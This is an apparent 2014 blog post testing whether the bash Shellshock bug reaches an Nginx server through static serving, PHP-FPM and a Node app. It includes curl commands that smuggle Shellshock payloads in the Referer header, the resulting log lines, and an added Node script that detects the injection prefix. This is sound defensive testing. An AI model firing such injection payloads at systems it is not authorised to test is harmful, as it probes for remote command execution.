Cases Where Bash Shellshock Does Not Apply

You saw the CVE, freaked out, updated the packages, and now you're wondering if you were vulnerable.

While DHCP and other pieces are reportedly vulnerable, the major focus has been on HTTP and other web-accessible endpoints.

In my case, I was running the following stack:

  • Nginx -> static files
  • Nginx -> PHP-FPM
  • Nginx -> proxy_pass -> Node applications

The test server was running CentOS, had vulnerable bash, and /bin/sh was symlinked to bash.

From what I can tell, Nginx does not explicitly pass environment variables through a shell.

The following cases appeared to be safe:

Static Nginx serving

curl --referer "() { :; }; ping 127.0.0.1" http://192.168.33.33/assets/page.js
curl --referer "() { :; }; echo test > /tmp/test" http://192.168.33.33/assets/page.js


192.168.33.1 - - [25/Sep/2014:13:44:47 +0000] "GET /assets/page.js HTTP/1.1" 200 17541 "() { :; }; ping 127.0.0.1" "curl/7.30.0"
192.168.33.1 - - [25/Sep/2014:13:45:23 +0000] "GET /assets/page.js HTTP/1.1" 200 17541 "() { :; }; echo test > /tmp/test" "curl/7.30.0"

Neither ping ran nor was test written.

Nginx to PHP-FPM through FastCGI


curl --referer "() { :; }; ping 127.0.0.1" http://192.168.33.33/login
curl --referer "() { :; }; echo test > /tmp/test" http://192.168.33.33/login

192.168.33.1 - - [25/Sep/2014:13:31:51 +0000] "GET /login HTTP/1.1" 200 3211 "() { :; }; echo test > /tmp/test" "curl/7.30.0"
192.168.33.1 - - [25/Sep/2014:13:33:14 +0000] "GET /login HTTP/1.1" 200 3211 "() { :; }; ping 127.0.0.1" "curl/7.30.0"

Again, neither ping ran nor was test written.

Nginx through Node.js app that runs a shell


curl --referer "() { :; }; ping 127.0.0.1" http://192.168.33.33/node

var http = require("http");
var exec = require("child_process").exec;

http.createServer(function(req, rep) {
    // Run a fixed command through /bin/sh; no request data is passed to it.
    exec("echo hi", function(err, stdout, stderr) {
        rep.end(stdout);
    });
}).listen(9090);

192.168.33.1 - - [25/Sep/2014:13:55:21 +0000] "GET /node HTTP/1.1" 200 14 "() { :; }; ping 127.0.0.1" "curl/7.30.0"

Again, nothing.

I would thus like to conclude that passing data through Nginx using FastCGI or proxy_pass does not require a shell, and therefore no public endpoints on my server were affected from what I know.
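
Why the Node case stays quiet even though it runs a shell, as an added example that is not part of the original post: it models the environment a CGI-style gateway hands to its child (RFC 3875 HTTP_* variables) next to the environment exec() hands over when no env option is given, and lists the variables that begin with the "() {" prefix used in the tests above. The helper names and sample values are constructed for illustration.

```javascript
// Added example, not code from the original post. Helper names are hypothetical.

// The tests on this page all send a value that begins with "() {"; a variable
// with that prefix in a bash process's environment is what the bug acts on.
const FUNC_PREFIX = '() {';

// Environment a classic CGI gateway builds (RFC 3875): every request header
// becomes an HTTP_* variable in the environment of the child process.
function cgiEnv(baseEnv, headers) {
  const env = Object.assign({}, baseEnv);
  for (const [name, value] of Object.entries(headers)) {
    env['HTTP_' + name.toUpperCase().replace(/-/g, '_')] = value;
  }
  return env;
}

// Environment the Node handler on this page gives to exec(): no `env` option
// is set, so the child inherits the server's own environment and nothing
// from the request is copied into it.
function inheritedEnv(baseEnv, _headers) {
  return Object.assign({}, baseEnv);
}

// Names of the variables whose values start with the function-definition prefix.
function shellshockCarriers(env) {
  return Object.keys(env)
    .filter((key) => String(env[key]).startsWith(FUNC_PREFIX))
    .sort();
}

// Constructed request headers, mirroring the curl --referer test above.
const headers = {
  referer: '() { :; }; ping 127.0.0.1',
  'user-agent': 'curl/7.30.0',
};
// Constructed stand-in for the server process's own environment.
const base = { PATH: '/usr/bin:/bin', HOME: '/var/www' };

console.log('CGI-style child env  :', shellshockCarriers(cgiEnv(base, headers)));
console.log('Node exec() child env:', shellshockCarriers(inheritedEnv(base, headers)));
```

Running shellshockCarriers(process.env) inside a service shows whether anything in its real environment carries the prefix before it spawns a shell.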

Also, some initial reports state that OpenSSH was vulnerable. In general, it appears that users would need a successful login shell to exploit this in the first place.

This is all anecdotal, and I'd like to see if anyone else can replicate these results.